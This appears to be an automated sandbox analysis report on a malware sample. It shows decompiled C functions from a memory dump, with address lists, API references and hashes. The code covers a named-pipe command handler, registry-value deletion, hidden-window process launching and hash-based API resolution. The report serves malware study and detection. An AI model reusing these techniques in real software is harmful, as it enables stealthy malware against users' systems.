0x00084ed0
0x00084ed3
0x00084ed9
0x00084ef8
0x00084efe
0x00084eff
0x00084f00
0x00084f01
0x00084f02
0x00084f03
0x00084f0d
0x00084f11
0x00084f16
0x00084f19
0x00084f1b
0x00084f2d
0x00084f2d
0x00084f2f
0x00084f3b
0x00084f40
0x00084f46
0x00084f4f
0x00084f52
0x00084f54
0x00084f5f
0x00084f64
0x00084f69
0x00084f6e
0x00084f6e
0x00084f71
0x00084f78
0x00000000
0x00084f7e
0x00084f7e
0x00084f83
0x00084f87
0x00084f89
0x00084f8c
0x00084f8e
0x00084f94
0x00084f94
0x00084f8e
0x00084f96
0x00084f9b
0x00084fa1
0x00084fa3
0x00000000
0x00084fa9
0x00084fa9
0x00084fad
0x00085082
0x00085088
0x0008508e
0x00085099
0x0008509a
0x0008509b
0x0008509c
0x000850a2
0x000850a7
0x000850ad
0x000850b5
0x000850bb
0x000850be
0x000850cd
0x000850d4
0x000850d7
0x000850e4
0x000850e8
0x000850f5
0x000850fa
0x000850fd
0x000850ff
0x00085110
0x00085112
0x00085116
0x00085117
0x00085119
0x00085124
0x00085129
0x00085136
0x0008513a
0x0008513b
0x0008513d
0x00085145
0x00085146
0x0008514b
0x00085163
0x00085168
0x0008516b
0x0008516f
0x00085171
0x00085184
0x0008518e
0x00085192
0x0008519a
0x0008519b
0x000851a3
0x000851a4
0x000851a9
0x000851b5
0x000851bf
0x000851d1
0x000851dd
0x000851e2
0x000851e2
0x000851ec
0x000851f2
0x000851f2
0x00085119
0x000850ff
0x00000000
0x00085088
0x00084fb3
0x00084fb6
0x00000000
0x00000000
0x00084fbc
0x00084fc7
0x00084fc8
0x00084fc9
0x00084fca
0x00084fd0
0x00084fd5
0x00084fe9
0x00084fee
0x00084ff2
0x00084ffd
0x00085006
0x00085008
0x0008500c
0x0008500d
0x0008500f
0x0008501a
0x00085020
0x00085032
0x00085035
0x00085038
0x00085045
0x0008504d
0x00085057
0x00085069
0x00085075
0x0008507a
0x00000000
0x0008500f
0x00084fa3
0x00084edb
0x00084edb
0x00084ee1
0x00084ee3
0x00000000
0x00000000
0x00084ee5
0x00084ee9
0x000851f3
0x000851f8
0x000851fe
0x00085200
0x00085201
0x00085205
0x00085215
0x0008521a
0x0008521e
0x00085220
0x00085224
0x00085229
0x0008522b
0x0008522d
0x00085233
0x00085233
0x00085240
0x00085246
0x0008524c
0x00085251
0x0008526f
0x00085271
0x0008527d
0x0008527d
0x00085283
0x00085285
0x0008528b
0x0008529d
0x000852a3
0x000852af
0x000852b7
0x000852b7
0x000852b7
0x000852b9
0x000852bf
0x000852bf
0x00084eef
0x00084ef2
0x00000000
0x00000000
0x00000000
0x00084ef2
0x00084ed9
0x00084e1d
0x00084e1d
0x00000000
0x00084e1d
0x00084d9b
0x00084da2
0x00084dab
0x00084dad
0x00084db3
0x00084dc4
0x00084dcd
0x00084dcd
0x00084dd9
0x00084de2
0x00084de7
0x00084dec
0x00000000
0x00000000
0x00084dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 0008526F
lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 00085283

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
Opcode Fuzzy Hash: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0x12af8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x17d0020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x17d0020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x000832ac
0x000832ae
0x000832b0
0x000832b4
0x000832b7
0x000832c3
0x000832ce
0x00000000
0x00000000
0x000832e1
0x000832e5
0x000832e6
0x000832eb
0x000832f0
0x000832f6
0x00083304
0x000834a8
0x00083314
0x00083314
0x0008331d
0x00083320
0x000833c8
0x000833ca
0x000833d1
0x000833d7
0x000833dd
0x00083456
0x00083461
0x00083466
0x00083469
0x000833df
0x000833e2
0x000833ee
0x000833f0
0x000833f6
0x00083471
0x000833f8
0x000833fd
0x000833ff
0x00083402
0x00083404
0x00083412
0x00083417
0x0008341a
0x0008341b
0x00083420
0x00083423
0x00083427
0x00083427
0x0008342c
0x00083439
0x0008343e
0x00083441
0x0008344d
0x0008344d
0x00083473
0x00083473
0x000833dd
0x00083476
0x0008348a
0x0008348f
0x0008349a
0x0008349b
0x00000000
0x00083326
0x00083326
0x00083329
0x00083397
0x00083398
0x0008339b
0x0008339c
0x000833a3
0x000833ae
0x000833b0
0x0008332b
0x0008332c
0x0008332f
0x0008337f
0x00000000
0x00083331
0x00083331
0x00083334
0x00083369
0x00000000
0x00083336
0x00083336
0x00083339
0x00083353
0x00083358
0x0008335b
0x00083386
0x00083387
0x00083388
0x0008335d
0x0008335d
0x00083360
0x00083361
0x00083361
0x0008338a
0x0008338b
0x0008333b
0x0008333e
0x00083348
0x0008336e
0x0008336e
0x00083373
0x00083374
0x0008349d
0x0008349d
0x0008349e
0x000834a3
0x000834a3
0x0008333e
0x00083339
0x00083334
0x0008332f
0x00083329
0x00083320
0x000834b4
0x000834bc
0x00000000
0x00000000
0x00000000
0x000834bc
0x000834c8

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
GetLastError.KERNEL32 ref: 000832D0

Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001F8), ref: 0008C35F

DisconnectNamedPipe.KERNEL32 ref: 000834B4

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000861B4, Relevance: 6.1, APIs: 4, Instructions: 145
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E00088604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0x12afab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E0008861A( &_v32, 0x3fff); // executed
					E0008861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x12afab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x12afab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x12afb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x12afab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x12afab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x000861b4
0x000861b4
0x000861c0
0x000861cf
0x000861d2
0x000861dc
0x000861e4
0x000861e7
0x000861ef
0x000861f1
0x000861f4
0x000861f9
0x00086365
0x00086369
0x00086369
0x00086209
0x0008620b
0x00086211
0x00000000
0x00000000
0x00086234
0x00086333
0x00086337
0x00086339
0x00086341
0x00086341
0x0008634d
0x0008635b
0x00000000
0x00086360
0x0008623d
0x00086241
0x00086245
0x00086249
0x0008624d
0x0008624e
0x0008624f
0x00086250
0x00086251
0x00086255
0x0008625c
0x0008625d
0x00086262
0x0008626d
0x00086282
0x00086284
0x00000000
0x00000000
0x0008628a
0x0008628d
0x00086295
0x000862a2
0x000862a7
0x000862aa
0x000862b3
0x000862ba
0x000862ca
0x000862d4
0x000862da
0x000862dc
0x000862e1
0x000862ea
0x000862ec
0x000862ee
0x000862f0
0x000862fa
0x00086300
0x00086304
0x00086308
0x0008630d
0x00086313
0x00086315
0x00086317
0x00086317
0x0008631e
0x0008631e
0x00086304
0x00086323
0x00086323
0x00086326
0x00086327
0x0008632a
0x0008632a
0x00000000
0x0008628d
0x0008626f
0x00086277
0x00000000

APIs

memset.MSVCRT ref: 000861D2

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
memset.MSVCRT ref: 00086295
memset.MSVCRT ref: 000862A2

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memset$AllocateHeapOpen
String ID:
API String ID: 2508404634-0
Opcode ID: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
Opcode Fuzzy Hash: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008A911, Relevance: 6.1, APIs: 4, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0x12af8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					CloseHandle(_v20.hThread);
					_t32 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x0008a91c
0x0008a925
0x0008a92c
0x0008a934
0x0008a938
0x0008a939
0x0008a93a
0x0008a93b
0x0008a93c
0x0008a941
0x0008a945
0x0008a948
0x0008a948
0x0008a955
0x0008a971
0x0008a9ae
0x0008a973
0x0008a976
0x0008a978
0x0008a97b
0x0008a980
0x0008a988
0x0008a990
0x0008a990
0x0008a988
0x0008a99e
0x0008a9a1
0x0008a9a9
0x0008a9a9
0x0008a9b6

APIs

memset.MSVCRT ref: 0008A925
CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
CloseHandle.KERNELBASE(?), ref: 0008A99E

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCodeCreateExitHandlememset
String ID:
API String ID: 2668540068-0
Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0x12afbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0x12afbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xf0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0x12afbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}

0x0008b012
0x0008b023
0x0008b035
0x0008b037
0x0008b045
0x0008b054
0x0008b05f
0x0008b067
0x0008b074
0x0008b07a
0x0008b07e
0x0008b080
0x0008b094
0x0008b09d
0x0008b0a8
0x0008b0a8
0x0008b094
0x0008b0ab
0x0008b0b2
0x0008b0d0
0x0008b0dd

APIs

memset.MSVCRT ref: 0008B037
memset.MSVCRT ref: 0008B045
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F

Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
String ID:
API String ID: 3158470084-0
Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0x12afab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x0008bf55
0x0008bf58
0x0008bf5b
0x0008bf66
0x0008bf8a
0x0008bfc7
0x0008bfca
0x0008bfcc
0x0008bfd4
0x0008bfd4
0x0008bfd7
0x0008bfd9
0x00000000
0x0008bfd9
0x0008bf94
0x0008bf96
0x0008bf9c
0x00000000
0x00000000
0x0008bfb8
0x0008bfe5
0x0008bfe8
0x00000000
0x0008bfe8
0x0008bfc0
0x00000000
0x0008bfc6
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
Opcode Fuzzy Hash: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E00088604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x0008beae
0x0008beb8
0x0008bebb
0x0008bec3
0x00000000
0x0008bec5
0x0008becc
0x0008bee6
0x0008bef2
0x0008bef7
0x0008bf15
0x0008bf1a
0x0008bf1f
0x0008bf1f
0x0008bf1a
0x0008bef7
0x0008bf24
0x0008bf2e
0x0008bf2e
0x00000000

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,012AFC08,00000000,?,00000002), ref: 0008BEBE
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x0008dfb6
0x0008dfb8
0x0008dfbb
0x0008dfbe
0x0008dfc4
0x0008e021
0x00000000
0x0008e021
0x0008dfc6
